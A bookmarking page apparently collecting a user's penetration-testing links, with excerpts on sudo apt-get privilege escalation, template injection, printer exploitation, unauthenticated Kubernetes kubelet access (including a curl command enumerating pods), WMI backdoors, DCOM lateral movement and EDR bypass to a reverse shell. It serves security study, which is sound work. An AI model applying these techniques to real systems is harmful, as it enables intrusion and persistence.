pentest   3879

« earlier    

Linux Privilege Escalation – Using apt-get/apt/dpkg to abuse sudo “NOPASSWD” misconfiguration – Logan S Diomedi – lsdsecurity
There are many well known and documented attack vectors for the sudo command that exist. Please see my Useful Resources page for the Windows & Linux Privilege Escalation piece that contains a ton of helpful knowledge in this category. Today, we’re going to be using a very poorly documented feature in apt-get when a normal user is allowed to execute apt-get as a root user. Let’s dive in!
linux  privesc  privilegeescalation  sudo  pentest  security 
2 days ago by whip_lash
Template engines are widely used by web applications to present dynamic data via web pages and emails. Unsafely
embedding user input in templates enables Server-Side Template Injection, a frequently critical vulnerability that is
extremely easy to mistake for Cross-Site Scripting (XSS), or miss entirely. Unlike XSS, Template Injection can be used to
directly attack web servers' internals and often obtain Remote Code Execution (RCE), turning every vulnerable
application into a potential pivot point.
templateinjection  webapp  pentest 
4 days ago by whip_lash
Occurs when invalid user input is embedded into the template
• Often XSS attack occurs but SSTI can be missed
• Can lead to a remote code execution (RCE)
• Developer error or intentional exposure
templateinjection  webapp  pentest 
4 days ago by whip_lash
PRETty - "PRinter Exploitation Toolkit" LAN Automation Tool - KitPloit - PenTest & Hacking Tools for your CyberSecurity Kit ☣
PRETty is useful when a large number of printers are present on a network. Instead of scanning, logging, and manually running PRET againt each individual printer, PRETty will automatically discover and run choosen PRET payloads against all printers on the target network. Additionally, PRETty can be used to automate command/payload delivery to any given list of printers (See the "Lists" section)
printer  pentest 
4 days ago by whip_lash
Favorite tweet:

If you like this kind of @Burp_Suite tips, here's ~100 pages of them. That was published in 2013 but most of it is still valid.

— Nicolas Grégoire (@Agarri_FR) January 16, 2019
burp  proxy  pentest 
4 days ago by whip_lash
Kubernetes: unauth kublet API 10250 token theft & kubectl Carnal0wnage - Attack Research Blog Carnal0wnage & Attack Research Blog
do a curl -s https://k8-node:10250/runningpods/ to get a list of running pods

With that data, you can craft your post request to exec within a pod so we can poke around.
kubernetes  pentest  security  vulnerability 
5 days ago by whip_lash
Kubernetes: unauth kublet API 10250 basic code exec Carnal0wnage - Attack Research Blog Carnal0wnage & Attack Research Blog
Unauth API access (10250)

Most Kubernetes deployments provide authentication for this port. But it’s still possible to expose it inadvertently and it's still pretty common to find it exposed via the "insecure API service" option.

Everybody who has access to the service kubelet port (10250), even without a certificate, can execute any command inside the container.
kubernetes  security  pentest  vulnerability 
5 days ago by whip_lash
us-15-Graeber-Abusing-Windows-Management-Instrumentation-WMI-To-Build-A-Persistent Asynchronous-And-Fileless-Backdoor-wp.pdf
As technology is introduced and subsequently deprecated over time in the Windows operating system,
one powerful technology that has remained consistent since Windows NT 4.01
and Windows 952
Windows Management Instrumentation (WMI). Present on all Windows operating systems, WMI is
comprised of a powerful set of tools used to manage Windows systems both locally and remotely.
powershell  wmi  pentest  postexploitation 
5 days ago by whip_lash
GitHub - epinna/tplmap: Server-Side Template Injection and Code Injection Detection and Exploitation Tool
Tplmap assists the exploitation of Code Injection and Server-Side Template Injection vulnerabilities with a number of sandbox escape techniques to get access to the underlying operating system.
injection  template  pentest  webapp 
5 days ago by whip_lash
GitHub - Bashfuscator/Bashfuscator: A fully configurable and extendable Bash obfuscation framework. This tool is intended to help both red team and blue team.
Favorite tweet:

Introducing Bashfuscator : A fully configurable and extendable Bash obfuscation framework : cc @capnspacehook

— Binni Shah (@binitamshah) January 14, 2019
bash  obfuscation  pentest 
6 days ago by whip_lash
Attacking Kubernetes through Kubelet
Favorite tweet:

Attacking Kubernetes through Kubelet :

— Binni Shah (@binitamshah) January 14, 2019
kubernetes  pentest  vulnerability  security 
7 days ago by whip_lash
Bypassing Crowdstrike Falcon detection, from phishing email to reverse shell - Malware - 0x00sec - The Home of the Hacker
When I say bypassing, I mean completely bypass detection, from the phishing email received by the user to the reverse shell. Something realistic, not just writing a malware and see if it gets executed.

So if we can’t use the classic techniques, about trying some new (old) trick?

Turns out, it was pretty trivial ¯\_(ツ)_/¯.
malware  pentest  antivirus 
7 days ago by whip_lash
Powershell Script for Enumerating Vulnerable DCOM Applications: DCOMrade
   DCOMrade is a Powershell script that is able to enumerate the possible vulnerable DCOM applications that might allow for lateral movement, code execution, data exfiltration, etc. The script is build to work with Powershell 2.0 but will work with all versions above as well.
dcom  windows  pentest  powershell  postexploitation  security 
10 days ago by whip_lash
Lateral Movement via DCOM: Round 2 | enigma0x3
This resulted in identifying the MMC20.Application COM object and its “ExecuteShellCommand” method, which you can read more about here. Thanks to the help of James Forshaw (@tiraniddo), we determined that the MMC20.Application object lacked explicit “LaunchPermissions”, resulting in the default permission set allowing Administrators access:
dcom  security  windows  postexploitation  pentest 
10 days ago by whip_lash

« earlier    

related tags

802.1x  account  actiontec  active-directory  activedirectory  ad  antivirus  applocker  archive  attack  audit  aws  azure  bash  ble  bloodhound  bluetooth  bmc  burp  c#  c2  cgi  cli  cloud  company  credentials  ctf  cyb452  cyb608  cyb633  daily  danderspritz  dcom  default_credentials  deserialization  deviceguard  devops  directory  dns  domain  dotnet  elasticsearch  es  eu  evasion  expoit  from-inoreader  github  google  hacking  hardware  hash  hashcat  hashes  hn  ics  infosec  injection  ironpython  java  javascript  js  keyboard  kibana  kubernetes  lab  lfi  links  linux  list  logging  logs  malware  mitm  nac  netsec  nsa  obfuscation  online  osint  osx  patrol  pcap  pentesting  phar  php  portsecurity  postexploitation  powershell  practice  printer  privesc  privilegeescalation  proxy  python  raspberrypi  rce  rdp  recon  record  redteam  remote  replay  reporting  research  rpi  screencapture  sec  secops  secopscats  security  service  snmp  ssh  standards  stripping  sudo  telus  template  templateinjection  test  tool  tools  tutorial  uac  usb  v1000h  vbscript  video  vm  vuln  vulnerability  vulnerable  wap  webapp  webshell  wifi  windows  wireless  wmi  wordlist  xxe 

Copy this bookmark: